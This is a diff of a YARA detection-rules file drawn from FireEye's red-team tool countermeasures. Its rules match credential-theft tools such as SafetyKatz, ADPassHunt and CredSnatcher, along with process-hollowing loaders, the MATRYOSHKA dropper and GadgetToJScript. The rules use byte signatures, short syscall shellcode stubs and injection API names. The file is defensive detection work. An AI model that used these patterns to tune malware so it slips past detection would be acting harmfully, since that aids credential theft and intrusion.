-		$str11 = "OpenProcess" ascii wide
-		$str12 = "LoadLibrary" ascii wide
-		$str13 = "GetProcAddress" ascii wide
+		$typelibguid0 = "d888cec8-7562-40e9-9c76-2bb9e43bb634" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of ( $str* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_Hacktool_Win64_Andrewspecial_1 : FILE
+rule FIREEYE_RT_Credtheft_MSIL_Credsnatcher_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'CredSnatcher' project."
 		author = "FireEye"
-		id = "20ce4902-4eb3-5ecf-aa8c-0515965dde57"
-		date = "2020-11-25"
-		date = "2020-11-25"
+		id = "0d8f7495-4748-577d-8ef2-ccc4829fc165"
+		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TITOSPECIAL/production/yara/HackTool_Win64_AndrewSpecial_1.yar#L4-L18"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/CredTheft_MSIL_CredSnatcher_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "4456e52f6f8543c3ba76cb25ea3e9bd2"
-		logic_hash = "96f06c46dfec795fcfd08c188853d0a3f781003ae118833719a175eb59049c0d"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "2c86be1bcf29bcb2c167f9248dee0ab4a5a5c6740fb1f18784ee2e380176df91"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		rev = 5
+		rev = 1
 
 	strings:
-		$dump = { 33 D2 B9 FF FF 1F 00 FF 15 [10-90] 00 00 00 00 [2-6] 80 00 00 00 [2-6] 02 00 00 00 45 33 C9 45 33 C0 BA 00 00 00 10 48 8D 0D [4] FF 15 [4-120] 00 00 00 00 [2-6] 00 00 00 00 [2-6] 00 00 00 00 41 B9 02 00 00 00 [6-15] E8 [4-20] FF 15 }
-		$shellcode_x64 = { 4C 8B D1 B8 3C 00 00 00 0F 05 C3 }
-		$shellcode_x64_inline = { C6 44 24 ?? 4C C6 44 24 ?? 8B C6 44 24 ?? D1 C6 44 24 ?? B8 C6 44 24 ?? 3C C6 44 24 ?? 00 C6 44 24 ?? 00 C6 44 24 ?? 00 C6 44 24 ?? 0F C6 44 24 ?? 05 C6 44 24 ?? C3 }
+		$typelibguid0 = "370b4d21-09d0-433f-b7e4-4ebdd79948ec" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and $dump and any of ( $shellcode* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_TITOSPECIAL_1 : FILE
+rule FIREEYE_RT_Loader_Win_Generic_19 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "b12490ba-41f6-5469-bcbb-0d2e0055c193"
-		date = "2020-11-25"
-		date = "2020-11-25"
+		id = "4f4427ee-0f7d-5442-98a6-402d8b797289"
+		date = "2020-12-02"
+		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TITOSPECIAL/production/yara/APT_HackTool_MSIL_TITOSPECIAL_1.yar#L4-L20"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/supplemental/yara/Loader_Win_Generic_19.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "4bf96a7040a683bd34c618431e571e26"
-		logic_hash = "6def0c667d38c1bad9233628e509bdcaed322e75be4ff3823b0f788c391e090c"
+		hash = "3fb9341fb11eca439b50121c6f7c59c7"
+		logic_hash = "6db9696663c19857c1f89339b8cc9b0565e877f34e8d8cf77b89ef22b3f41683"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 5
+		rev = 1
 
 	strings:
-		$ind_dump = { 1F 10 16 28 [2] 00 0A 6F [2] 00 0A [50-200] 18 19 18 73 [2] 00 0A 13 [1-4] 06 07 11 ?? 6F [2] 00 0A 18 7E [2] 00 0A 7E [2] 00 0A 7E [2] 00 0A 28 [2] 00 06 }
-		$ind_s1 = "NtReadVirtualMemory" fullword wide
-		$ind_s2 = "WriteProcessMemory" fullword
-		$shellcode_x64 = { 4C 8B D1 B8 3C 00 00 00 0F 05 C3 }
-		$shellcode_x86 = { B8 3C 00 00 00 33 C9 8D 54 24 04 64 FF 15 C0 00 00 00 83 C4 04 C2 14 00 }
+		$s0 = { 8B [1-16] 89 [1-16] E8 [4-32] F3 A4 [0-16] 89 [1-8] E8 }
+		$s1 = { 83 EC [1-16] 04 00 00 00 [1-24] 00 30 00 00 [1-24] FF 15 [4-16] EB [16-64] 20 00 00 00 [0-8] FF 15 [4-32] C7 44 24 ?? 00 00 00 00 [0-8] C7 44 24 ?? 00 00 00 00 [0-16] FF 15 }
+		$si1 = "VirtualProtect" fullword
+		$si2 = "malloc" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of ( $ind* ) and any of ( $shellcode* )
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_Credtheft_MSIL_Titospecial_2 : FILE
+rule FIREEYE_RT_Loader_MSIL_Generic_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the TitoSpecial project. There are 2 GUIDs in this rule as the x86 and x64 versions of this tool use a different ProjectGuid."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "0262c720-e6b8-5bf2-a242-19a7f044973f"
+		id = "f919e3fc-cf76-53af-8f04-24921830666f"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TITOSPECIAL/production/yara/CredTheft_MSIL_TitoSpecial_2.yar#L4-L16"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/supplemental/yara/Loader_MSIL_Generic_1.yar#L4-L21"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "4bf96a7040a683bd34c618431e571e26"
-		logic_hash = "2f621f8de2a4679e6cbce7f41859eaa3095ca54090c8bfccd3b767590ac91f2c"
+		hash = "b8415b4056c10c15da5bba4826a44ffd"
+		logic_hash = "06cddd7e1c1c778348539cfd50f01d55f86689dec86c045d7ce7b9cd71690e07"
 		score = 75
-		quality = 71
+		quality = 75
 		tags = "FILE"
-		rev = 4
+		rev = 5
 
 	strings:
-		$typelibguid1 = "C6D94B4C-B063-4DEB-A83A-397BA08515D3" ascii nocase wide
-		$typelibguid2 = "3b5320cf-74c1-494e-b2c8-a94a24380e60" ascii nocase wide
+		$MSIL = "_CorExeMain"
+		$opc1 = { 00 72 [4] 0A 72 [4] 0B 06 28 [4] 0C 12 03 FE 15 [4] 12 04 FE 15 [4] 07 14 }
+		$str1 = "DllImportAttribute"
+		$str2 = "FromBase64String"
+		$str3 = "ResumeThread"
+		$str4 = "OpenThread"
+		$str5 = "SuspendThread"
+		$str6 = "QueueUserAPC"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( $typelibguid1 or $typelibguid2 )
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and $MSIL and all of them
 }
-rule FIREEYE_RT_Hunting_B64Engine_Dotnettojscript_Dos
+rule FIREEYE_RT_Loader_Win_Generic_20 : FILE
 {
 	meta:
-		description = "This file may enclude a Base64 encoded .NET executable. This technique is used by the project DotNetToJScript which is used by many malware families including GadgetToJScript."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "24c9c259-9bb9-5f46-9278-4fa20eb3c8c4"
-		date = "2020-12-08"
+		id = "d1d3eff8-d12e-53f6-8c30-06ecedaf3f49"
+		date = "2020-12-02"
+		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/G2JS/production/yara/Hunting_B64Engine_DotNetToJScript_Dos.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/supplemental/yara/Loader_Win_Generic_20.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "7af24305a409a2b8f83ece27bb0f7900"
-		logic_hash = "e2afb43af469f8ae02f6fd21db6dbd45c997fb003e3aeeaa0d4ff3e85c64159a"
-		score = 50
+		hash = "5125979110847d35a338caac6bff2aa8"
+		logic_hash = "9611aed2b4e4278d40254cb5c4fe94a458cfa19f10e6fe888bc7ceb166669cc6"
+		score = 75
 		quality = 75
-		tags = ""
+		tags = "FILE"
 		rev = 1
 
 	strings:
-		$b64_mz = "AAC4AAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAOH7oOALQJzSG4AUzNIVRoaXMgcHJvZ3JhbSBjYW5ub3QgYmUgcnVuIGluIERPUyBtb2RlLg0NCiQAAAAAAAAAUEU"
+		$s0 = { 8B [1-16] 89 [1-16] E8 [4-32] F3 A4 [0-16] 89 [1-8] E8 }
+		$s2 = { 83 EC [4-24] 00 10 00 00 [4-24] C7 44 24 ?? ?? 00 00 00 [0-8] FF 15 [4-24] 89 [1-4] 89 [1-4] 89 [1-8] FF 15 [4-16] 3? ?? 7? [4-24] 20 00 00 00 [4-24] FF 15 [4-32] F3 A5 }
+		$si1 = "VirtualProtect" fullword
+		$si2 = "malloc" fullword
 
 	condition:
-		$b64_mz
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_Builder_MSIL_G2JS_1 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_Keepersist_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the Gadget2JScript project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'KeePersist' project."
 		author = "FireEye"
-		id = "484202c2-ac7d-5e6c-8bf1-3452a357c668"
+		id = "950a4744-2696-5eb7-8524-7f689cb5dbb0"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/G2JS/production/yara/Builder_MSIL_G2JS_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/KEEPERSIST/production/yara/HackTool_MSIL_KeePersist_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "fa255fdc88ab656ad9bc383f9b322a76"
-		logic_hash = "487d8e8deef218412f241d99ce32b63bfeb3568d23048b9dd4afff8f401bfea5"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "eae67c77a64ca07f9ef59a356bb2c3f3131f14e7f17c898ef8857a21090ace0e"
 		score = 75
 		quality = 73
 		tags = "FILE"
 		rev = 2
 
 	strings:
-		$typelibguid1 = "AF9C62A1-F8D2-4BE0-B019-0A7873E81EA9" ascii nocase wide
+		$typelibguid0 = "1df47db2-7bb8-47c2-9d85-5f8d3f04a884" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_Hunting_Gadgettojscript_1
+rule FIREEYE_RT_Hacktool_MSIL_SAFETYKATZ_4 : FILE
 {
 	meta:
-		description = "This rule is looking for B64 offsets of LazyNetToJscriptLoader which is a namespace specific to the internal version of the GadgetToJScript tooling."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SafetyKatz project."
 		author = "FireEye"
-		id = "76c932e0-55b3-56ef-bab6-eb6997b51ee7"
+		id = "e160b75d-cc39-5e16-86e1-cba9fe64a6b6"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/G2JS/production/yara/Hunting_GadgetToJScript_1.yar#L4-L17"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SAFETYKATZ/production/yara/HackTool_MSIL_SAFETYKATZ_4.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "7af24305a409a2b8f83ece27bb0f7900"
-		logic_hash = "a880c20e61376dacd4e3a04f2cf065f19067c29371180b1dec186172cadf9564"
-		score = 50
-		quality = 75
-		tags = ""
-		rev = 4
+		hash = "45736deb14f3a68e88b038183c23e597"
+		logic_hash = "a02b4acea691d485f427ed26487f2f601065901324a8dcd6cd8de9502d8cd897"
+		score = 75
+		quality = 73
+		tags = "FILE"
+		rev = 3
 
 	strings:
-		$s1 = "GF6eU5ldFRvSnNjcmlwdExvYWRl"
-		$s2 = "henlOZXRUb0pzY3JpcHRMb2Fk"
-		$s3 = "YXp5TmV0VG9Kc2NyaXB0TG9hZGV"
+		$typelibguid1 = "8347E81B-89FC-42A9-B22C-F59A6A572DEC" ascii nocase wide
 
 	condition:
-		any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
 }
-rule FIREEYE_RT_Hacktool_MSIL_SEATBELT_2 : FILE
+rule FIREEYE_RT_APT_Dropper_Win64_MATRYOSHKA_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SeatBelt project."
+		description = "matryoshka_dropper.rs"
 		author = "FireEye"
-		id = "225b42fe-c73a-59c0-a1f4-1d6dff6e76e1"
-		date = "2020-12-08"
+		id = "1406aafd-6217-51ef-b3af-107ee88f9c99"
+		date = "2020-12-02"
+		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BELTALOWDA/production/yara/HackTool_MSIL_SEATBELT_2.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Dropper_Win64_MATRYOSHKA_1.yar#L4-L18"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "9f401176a9dd18fa2b5b90b4a2aa1356"
-		logic_hash = "e48474c5025fd88e3c2824e1e943ff56cde0ea05984aad0249ccf73caa6d4a36"
+		hash = "edcd58ba5b1b87705e95089002312281"
+		logic_hash = "23f811f8e9387ca6a1257a31af66de9739733e4728adba0a3e3f74b5e5c0a556"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		rev = 3
+		rev = 1
 
 	strings:
-		$typelibguid1 = "AEC32155-D589-4150-8FE7-2900DF4554C8" ascii nocase wide
+		$sb1 = { 8D 8D [4] E8 [4] 49 89 D0 C6 [2-6] 01 C6 [2-6] 01 [0-8] C7 44 24 ?? 0E 00 00 00 4C 8D 0D [4] 48 8D 8D [4] 48 89 C2 E8 [4] C6 [2-6] 01 C6 [2-6] 01 48 89 E9 48 8D 95 [4] E8 [4] 83 [2] 01 0F 8? [4] 48 01 F3 48 29 F7 48 [2] 08 48 89 85 [4] C6 [2-6] 01 C6 [2-6] 01 C6 [2-6] 01 48 8D 8D [4] 48 89 DA 49 89 F8 E8 }
+		$sb2 = { 0F 29 45 ?? 48 C7 45 ?? 00 00 00 00 0F 29 45 ?? 0F 29 45 ?? 0F 29 45 ?? 0F 29 45 ?? 0F 29 45 ?? 0F 29 45 ?? 48 C7 45 ?? 00 00 00 00 C7 45 ?? 68 00 00 00 48 8B [2] 48 8D [2] 48 89 [3] 48 89 [3] 0F 11 44 24 ?? C7 44 24 ?? 08 00 00 0C C7 44 24 ?? 00 00 00 00 31 ?? 48 89 ?? 31 ?? 45 31 ?? 45 31 ?? E8 [4] 83 F8 01 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_SEATBELT_1 : FILE
+rule FIREEYE_RT_APT_Builder_Win64_MATRYOSHKA_1 : FILE
 {
 	meta:
-		description = "This rule looks for .NET PE files that have regex and format strings found in the public tool SeatBelt. Due to the nature of the regex and format strings used for detection, this rule should detect custom variants of the SeatBelt project."
+		description = "matryoshka_pe_to_shellcode.rs"
 		author = "FireEye"
-		id = "46477f87-2458-5b8e-894a-9aa536a441ad"
-		date = "2020-12-08"
+		id = "0afcf13e-5cd3-5c1c-897e-b6d0c283ab0f"
+		date = "2020-12-02"
+		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BELTALOWDA/production/yara/HackTool_MSIL_SEATBELT_1.yar#L4-L25"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Builder_Win64_MATRYOSHKA_1.yar#L4-L20"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "848837b83865f3854801be1f25cb9f4d"
-		logic_hash = "4248e5561ef60e725c23efc89c899d6fc8be5bf2142f700fb70daecd72c30dd8"
+		hash = "8d949c34def898f0f32544e43117c057"
+		logic_hash = "b370d7dea44bccc92fc8dbd4ea0ee9bec523820108bf8bc67acb17ebf9835f74"
 		score = 75
-		quality = 30
+		quality = 75
 		tags = "FILE"
-		rev = 3
+		rev = 1
 
 	strings:
-		$msil = "_CorExeMain" ascii wide
-		$str1 = "{ Process = {0}, Path = {1}, CommandLine = {2} }" ascii nocase wide
-		$str2 = "Domain=\"(.*)\",Name=\"(.*)\"" ascii nocase wide
-		$str3 = "LogonId=\"(\\d+)\"" ascii nocase wide
-		$str4 = "{0}.{1}.{2}.{3}" ascii nocase wide
-		$str5 = "^\\W*([a-z]:\\\\.+?(\\.exe|\\.dll|\\.sys))\\W*" ascii nocase wide
-		$str6 = "*[System/EventID={0}]" ascii nocase wide
-		$str7 = "*[System[TimeCreated[@SystemTime >= '{" ascii nocase wide
-		$str8 = "(http|ftp|https|file)://([\\w_-]+(?:(?:\\.[\\w_-]+)+))([\\w.,@?^=%&:/~+#-]*[\\w@?^=%&/~+#-])?" ascii nocase wide
-		$str9 = "{0}" ascii nocase wide
-		$str10 = "{0,-23}" ascii nocase wide
+		$sb1 = { 4D 5A 45 52 [0-32] E8 [0-32] 00 00 00 00 [0-32] 5B 48 83 EB 09 53 48 81 [0-32] C3 [0-32] FF D3 [0-32] C3 }
+		$ss1 = "\x00Stub Size: "
+		$ss2 = "\x00Executable Size: "
+		$ss3 = "\x00[+] Writing out to file"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $msil and all of ( $str* )
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_Wmisharp_1 : FILE
+rule FIREEYE_RT_APT_Loader_Win64_MATRYOSHKA_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'WMISharp' project."
+		description = "matryoshka_process_hollow.rs"
 		author = "FireEye"
-		id = "97b9d057-30d3-5af7-bac6-4dd53f47650f"
-		date = "2020-12-08"
+		id = "69919a80-8ed1-5b8c-911a-ceb75570f11f"
+		date = "2020-12-02"
+		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WMISHARP/production/yara/HackTool_MSIL_WMISharp_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Loader_Win64_MATRYOSHKA_1.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "d119d52c1410291d582696d5c4c1de3db9008db963c76a9e344959d869c3acc0"
+		hash = "44887551a47ae272d7873a354d24042d"
+		logic_hash = "46e5480dc95ce8b9d8385c2e44a50b21629301535b93833c13cc3db319ac15dd"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$typelibguid0 = "3a2421d9-c1aa-4fff-ad76-7fcb48ed4bff" ascii nocase wide
+		$sb1 = { 48 8B 45 ?? 48 89 85 [0-64] C7 45 ?? 00 00 00 00 31 ?? E8 [4-64] BA 00 10 00 00 [0-32] 41 B8 04 00 00 00 E8 [4] 83 F8 01 [2-32] BA [4] E8 }
+		$sb2 = { E8 [4] 83 F8 01 [2-64] 41 B9 00 10 00 00 [0-32] E8 [4] 83 F8 01 [2-32] 3D 4D 5A 00 00 [0-32] 48 63 ?? 3C [0-32] 50 45 00 00 [4-64] 0F B7 [2] 18 81 ?? 0B 01 00 00 [2-32] 81 ?? 0B 02 00 00 [2-32] 8B [2] 28 }
+		$sb3 = { 66 C7 45 ?? 48 B8 48 C7 45 ?? 00 00 00 00 66 C7 45 ?? FF E0 [0-64] 41 B9 40 00 00 00 [0-32] E8 [4] 83 F8 01 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
 }
-rule FIREEYE_RT_Credtheft_MSIL_Adpasshunt_1 : FILE
+rule FIREEYE_RT_APT_Loader_Win_MATRYOSHKA_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public ADPassHunt project."
+		description = "matryoshka_process_hollow.rs"
 		author = "FireEye"
-		id = "35fb8032-c73a-549f-9bd9-409f7050bdb0"
-		date = "2020-12-08"
+		id = "c07fb67e-ded5-593d-b5dc-d0e2c3b5a352"
+		date = "2020-12-02"
+		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/ADPASSHUNT/production/yara/CredTheft_MSIL_ADPassHunt_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Loader_Win_MATRYOSHKA_1.yar#L4-L24"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "6efb58cf54d1bb45c057efcfbbd68a93"
-		logic_hash = "85c7c147d6bf5b7cb417ff2910a3e7ab3be5e8a3651758c07f8f0ed42b5964d8"
-		score = 50
-		quality = 73
+		hash = "44887551a47ae272d7873a354d24042d"
+		logic_hash = "8f762684ffd3984630bf41ededa78b8993b53b22591a59912cabfe635775de53"
+		score = 75
+		quality = 75
 		tags = "FILE"
-		rev = 4
+		rev = 1
 
 	strings:
-		$typelibguid = "15745B9E-A059-4AF1-A0D8-863E349CD85D" ascii nocase wide
+		$s1 = "ZwQueryInformationProcess" fullword
+		$s2 = "WriteProcessMemory" fullword
+		$s3 = "CreateProcessW" fullword
+		$s4 = "WriteProcessMemory" fullword
+		$s5 = "\x00Invalid NT Signature!\x00"
+		$s6 = "\x00Error while creating and mapping section. NTStatus: "
+		$s7 = "\x00Error no process information - NTSTATUS:"
+		$s8 = "\x00Error while erasing pe header. NTStatus: "
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $typelibguid
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_Adpasshunt_2 : FILE
+rule FIREEYE_RT_APT_Dropper_Win_MATRYOSHKA_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "matryoshka_dropper.rs"
 		author = "FireEye"
-		id = "a3b12fd7-e82d-5ef0-9125-7c069cd9bec4"
+		id = "7fd305c7-0b1b-5d91-b968-7f1fb0a8ae47"
 		date = "2020-12-02"
 		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/ADPASSHUNT/production/yara/APT_HackTool_MSIL_ADPassHunt_2.yar#L4-L23"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Dropper_Win_MATRYOSHKA_1.yar#L4-L20"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "6efb58cf54d1bb45c057efcfbbd68a93"
-		logic_hash = "e2dc7db1860eef04a569f007c32abd507dd588d1392613efbb31f42ca66ff735"
-		score = 50
+		hash = "edcd58ba5b1b87705e95089002312281"
+		logic_hash = "a7bf7599ec9b4b1d09a8c90b70ae565a9396fb31d449da3c1492d6fa336d9c5e"
+		score = 75
 		quality = 75
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$s1 = "LDAP://" wide
-		$s2 = "[GPP] Searching for passwords now..." wide
-		$s3 = "Searching Group Policy Preferences (Get-GPPPasswords + Get-GPPAutologons)!" wide
-		$s4 = "possibilities so far)..." wide
